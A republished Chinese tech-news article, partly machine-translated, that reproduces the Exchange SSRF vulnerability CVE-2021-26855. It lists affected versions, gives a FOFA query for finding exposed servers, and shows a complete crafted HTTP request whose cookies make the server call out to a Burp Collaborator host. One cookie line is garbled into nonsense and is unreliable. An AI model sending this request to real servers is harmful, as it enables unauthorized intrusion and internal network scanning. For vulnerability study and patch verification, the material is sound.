Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you an analysis of how to achieve Exchange SSRF vulnerability CVE-2021-26855. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

0x01 vulnerability description

Exchange Server is a set of email service components of Microsoft, which is a messaging and collaboration system. March 3, 2021, Microsoft officially released a Microsoft Exchange security update, revealing a number of high-risk and serious vulnerabilities, among which: in the CVE-2021-26855 Exchange SSRF vulnerability, attackers can directly construct malicious requests, initiate arbitrary HTTP requests as Exchange server, scan the intranet, and obtain Exchange user information. This vulnerability can be exploited without authentication.

0x02 affects version

Exchange 2013 Versions

< 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010。 0x03 漏洞复现 fofa 搜索：app="Exchange"（注意：互联网的非授权利用属于违法行为） 访问outlook页面 开启burp抓包，构造数据包： GET /owa/auth/x.js HTTP/1.1Host: IPConnection: closesec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"sec-ch-ua-mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://IP/owa/auth/logon.aspx?url=https%3a%2f%2PIp%2fowa%2f&reason=0Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: X-AnonResource=true; X-AnonResource-Backend=oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;

Access url is: https://xxx.xxx.xxx.xxx/owa/auth/x.js (it seems that x.js can be constructed at will)

Construct the Cookie information as follows:

Cookie: Xmuran AnonResourceful truth; XMui AnonResourceMutual Backendroomoyq5v1vyqo5komisdc1jflTV zm5dt2.burpaccounator.netAccording to ecpAccord default.fltdistributor 3; X-BEResource=localhost/owa/auth/logon.aspx?~3

Where "oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net" is the dnslog information.

You can use the dnglog that comes with burp for verification:

Click burp and select Burp collaborator client:

Each DNSLog prompt message is different, but the message can be returned successfully:

1.dnslog.cn

2.ceye:

3. Zero group Dnslog

0x04 repair recommendation

Upgrade to the latest secure version

The above is the analysis of how to achieve the Exchange SSRF vulnerability CVE-2021-26855 shared by the editor. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.